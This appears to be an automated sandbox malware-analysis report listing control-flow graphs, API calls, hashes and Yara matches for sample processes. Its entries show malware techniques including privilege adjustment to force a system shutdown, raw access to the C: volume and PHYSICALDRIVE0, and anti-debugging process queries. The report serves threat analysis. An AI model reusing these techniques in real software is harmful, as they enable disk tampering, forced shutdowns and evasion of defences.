                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 04FEE036
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2444472029.0000000004FE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_4fe1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 040db8f627d2f0da430c1fc926ac87043b9bb39a5eb0f799242a143fd185f7cd
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8fd96a37a6556bed11bd6089f837bdcf066ad8bf8d09d290b07db6de6482cf06
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 040db8f627d2f0da430c1fc926ac87043b9bb39a5eb0f799242a143fd185f7cd
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 207170776187418FC320CF29D88069AB7E3BFC4314F658A18E5999B754DB35F906CB82
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNELBASE(?,?,?), ref: 04FE122C
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2444472029.0000000004FE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_4fe1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: de472bfbad0700a724fd77e042b9a7590b0bb9c13966180ede2c5d5add54b3f5
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0a8f6625afc0b2df406e69103220e73853dcc4307aadbd1829797d74a4d3033a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: de472bfbad0700a724fd77e042b9a7590b0bb9c13966180ede2c5d5add54b3f5
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E971C232A182008FD314CF6ACD8066FB7E7BBC4311F25CA2DE59597259DB74E846CB91
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2443758923.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_3140000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID: `
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 544645111-2679148245
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 93a9636f9859b9936bec72b5e6159afc64ef6c89352b4a021fce63d25602fa7a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0bcab94151b697019bd65460b71653ac76e5f16181f440a728308eeba9548302
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93a9636f9859b9936bec72b5e6159afc64ef6c89352b4a021fce63d25602fa7a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A94172B5E006289FDB54CF58C880B89FBB1FF48314F1581A9C909AB356D731AE91CF91
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2443758923.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_3140000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00402404
                                                                                                                                                                                                                                                                                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00402488
                                                                                                                                                                                                                                                                                                                                                                  • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,?), ref: 004024B4
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(NTDLL.DLL), ref: 004024D2
                                                                                                                                                                                                                                                                                                                                                                  • NtShutdownSystem.NTDLL(00000001), ref: 004024F1
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$AdjustLookupPrivilegePrivilegesShutdownSystemTokenValue
                                                                                                                                                                                                                                                                                                                                                                  • String ID: NTDLL.DLL$SeShutdownPrivilege$advapi32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2117616786-2471717051
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409574
                                                                                                                                                                                                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(000000FF,0046C2D0,00000000,00001000,00003000,00000004), ref: 004095E1
                                                                                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(DB51E8EC), ref: 00409610
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitUnicodeString.NTDLL(00000180,00520000), ref: 00409626
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitUnicodeString.NTDLL(00000178,00520000), ref: 0040963C
                                                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(DB51E8EC), ref: 00409649
                                                                                                                                                                                                                                                                                                                                                                  • LdrEnumerateLoadedModules.NTDLL(00000000,004050A2,00404393), ref: 0040965A
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalInitSectionStringUnicode$AllocateDirectoryEnterEnumerateLeaveLoadedMemoryModulesVirtualWindows
                                                                                                                                                                                                                                                                                                                                                                  • String ID: explorer.exe
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3728205514-3187896405
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

control_flow_graph 71 408958-4089db CreateFileA DeviceIoControl 72 4047e0-4047ed FindCloseChangeNotification 71->72 73 4089e1-4089e5 71->73 73->72 74 4089eb-408a08 73->74 74->72
APIs
• FindCloseChangeNotification.KERNELBASE(?), ref: 004047E4
• CreateFileA.KERNELBASE(\\.\C:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00408972
• DeviceIoControl.KERNELBASE(?,00560000,00000000,00000000,?,00000020,?,00000000), ref: 00408994
Strings
Memory Dump Source
• Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_93B.jbxd
Yara matches
Similarity
• API ID: ChangeCloseControlCreateDeviceFileFindNotification
• String ID: \\.\C:$\\.\PHYSICALDRIVE0
• API String ID: 1020254441-2160117148
• Opcode ID: 320e27fcbf62a17e998bc26e42cf0c1a2d27fdc4df0059520f6dda202d1693b9
• Instruction ID: 6179182b2b83b9443c5bd9d33f461fa1aeab268a59a3a7b7debce46551af33e6
• Opcode Fuzzy Hash: 320e27fcbf62a17e998bc26e42cf0c1a2d27fdc4df0059520f6dda202d1693b9
• Instruction Fuzzy Hash: AF216D38640348EFD718CF68ED45F99BBB4EB48701F10C1AAE905AB3E1D6B49B40CB58
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 75 40895b-4089db CreateFileA DeviceIoControl 76 4047e0-4047ed FindCloseChangeNotification 75->76 77 4089e1-4089e5 75->77 77->76 78 4089eb-408a08 77->78 78->76
APIs
• FindCloseChangeNotification.KERNELBASE(?), ref: 004047E4
• CreateFileA.KERNELBASE(\\.\C:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00408972
• DeviceIoControl.KERNELBASE(?,00560000,00000000,00000000,?,00000020,?,00000000), ref: 00408994
Strings
Memory Dump Source
• Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_93B.jbxd
Yara matches
Similarity
• API ID: ChangeCloseControlCreateDeviceFileFindNotification
• String ID: \\.\C:$\\.\PHYSICALDRIVE0
• API String ID: 1020254441-2160117148
• Opcode ID: 6e1c8ed08f6fcb21cf0fed49fef2ed80236c62ed62855b81c13f5c76d91f0969
• Instruction ID: 711083b2bbb86b7d36e7a7c78397dedf6b4307ebbdc5261e1e4f3fe33cb2826c
• Opcode Fuzzy Hash: 6e1c8ed08f6fcb21cf0fed49fef2ed80236c62ed62855b81c13f5c76d91f0969
• Instruction Fuzzy Hash: 6F215C38600308AFD718CF58DC46F99BBB4AB48701F10C0AAE905AB3E1D6B4AA40CB58
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 79 408951-4089db CreateFileA DeviceIoControl 81 4047e0-4047ed FindCloseChangeNotification 79->81 82 4089e1-4089e5 79->82 82->81 83 4089eb-408a08 82->83 83->81
APIs
• FindCloseChangeNotification.KERNELBASE(?), ref: 004047E4
• CreateFileA.KERNELBASE(\\.\C:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00408972
• DeviceIoControl.KERNELBASE(?,00560000,00000000,00000000,?,00000020,?,00000000), ref: 00408994
Strings
Memory Dump Source
• Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_93B.jbxd
Yara matches
Similarity
• API ID: ChangeCloseControlCreateDeviceFileFindNotification
• String ID: \\.\C:$\\.\PHYSICALDRIVE0
• API String ID: 1020254441-2160117148
• Opcode ID: 43b5c774c06db54b38c673015130514d13990ffabb50efddd8f557c0ac6fe542
• Instruction ID: 389e508c5a35674a8dec956cf5ed0ace9ff19c3110c7d277eeff61c57732489a
• Opcode Fuzzy Hash: 43b5c774c06db54b38c673015130514d13990ffabb50efddd8f557c0ac6fe542
• Instruction Fuzzy Hash: 79216D78604348EFD708CF58E855BA9BBB4EB48711F10C1AAE905AB3E1D7B49B40CB59
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 193 401b2c-401b36 194 402a85-402ab5 call 40335c NtQueryInformationProcess 193->194 195 401b3c-401b3e 193->195 199 401fe6-401fe8 194->199 200 402abb-402ac3 194->200 196 40844c-40844f 195->196 199->196 201 40bda2 200->201 202 402ac9-409df6 200->202 202->196
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtQueryInformationProcess.NTDLL(00000000,00000000,00000020,00000020,00000000), ref: 00402AA8
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: InformationProcessQuery
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1778838933-3916222277
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 99cf6030004cc14fcfbf758772858fa4ef28e9fcd54024a0ddfc1a5f41bc18d2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b5fb0c1052741472a29b3626a296402ee31a9556d555090f334d473f401f16ea
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99cf6030004cc14fcfbf758772858fa4ef28e9fcd54024a0ddfc1a5f41bc18d2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E01A471D04308FBDB00DF90C98A7EDBBB8AB05314F24506AE540772C1E7BC9685A75A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 204 40aea4-40aec0 GetPEB call 40d1f6 207 401bd2-401bd9 call 40c13c 204->207 208 40aec6 call 404369 204->208 213 4044bc-4044c3 call 403aee 207->213 214 401bdf 207->214 212 40aecb 208->212 212->207 218 4044c9 213->218 219 40a95e-40a96a call 4043ad call 407d21 213->219 215 40bfa2-40bfa5 214->215 218->215 224 40a970-40a97b Sleep call 4023f2 219->224 225 402b44-402b46 ExitProcess 219->225 227 40a980 224->227 227->225
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Module$FileHandleInitializeLibraryLoadName
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1691763914-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7a2ac303de4b0b2ba4ade585fa2e29916ceed782501468d31b7631315bf6b27d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b20ac1345fbffd2ee6b09d0fcfa97f88ae309217d757d61775f2d603f36cc11d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a2ac303de4b0b2ba4ade585fa2e29916ceed782501468d31b7631315bf6b27d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BF0BE70608345D6C6047FB38E4672A76B8AF0030DF10407FFD02B62D2EA7E9A11559F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00407D33
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2050909247-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5469e9984ee0613fe67692c8399fce14f271ad5feb70d4257aac3e9e61b94720
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2d0ccdd24a91546423dca3ee3cf720458c613a0087a6006a7f2d7a66fbfa4b10
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5469e9984ee0613fe67692c8399fce14f271ad5feb70d4257aac3e9e61b94720
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CF065B4D00348EFC704EFA599896ADBBB4AB04701F10857AE85277395E2BC5644CF9A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 0 40e52b-40e632 LocalAlloc * 11
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNELBASE(00000040,00004000,004046B5,?,0040C145,004046B5,?,00401BD7), ref: 0040E53D
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00004000,?,0040C145,004046B5,?,00401BD7), ref: 0040E54F
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00004000,?,0040C145,004046B5,?,00401BD7), ref: 0040E561
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00001000,?,0040C145,004046B5,?,00401BD7), ref: 0040E573
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00001000,?,0040C145,004046B5,?,00401BD7), ref: 0040E585
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00008000,?,0040C145,004046B5,?,00401BD7), ref: 0040E597
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00008004,?,0040C145,004046B5,?,00401BD7), ref: 0040E5A9
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,000001F4,?,0040C145,004046B5,?,00401BD7), ref: 0040E5E5
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,000000FC,?,0040C145,004046B5,?,00401BD7), ref: 0040E5F7
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000400,?,0040C145,004046B5,?,00401BD7), ref: 0040E609
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00010000,?,0040C145,004046B5,?,00401BD7), ref: 0040E61B
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                                                                                  • String ID: @j$H/k$Pok
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3494564517-2682762538
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 65ac8032e033309efcc9f8c0d48804f40c42494c7e65b2be43682c95c20d6d53
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 884c2741ace77f4595bd006b1489b08cdeecc1dacb1c364e852769e485284a96
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65ac8032e033309efcc9f8c0d48804f40c42494c7e65b2be43682c95c20d6d53
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44213CB4A41300AFF354AF65AC56B743AA0F708B59F108035FB89A63E0F6F455858E5F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00407A5F
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000000), ref: 00407A6B
                                                                                                                                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00407A86
                                                                                                                                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 00409C94
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Token$InformationLocal$AllocChangeCloseFindFreeNotificationOpenProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2854556994-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2fabac034638274b2c3e67be2bc06953f5cdff95292f6c9f39c7e9c359d166b0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2e4b4cc31351ce880421fb230fd6ac05725b6f10eb8191371f756e524e2f733f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fabac034638274b2c3e67be2bc06953f5cdff95292f6c9f39c7e9c359d166b0
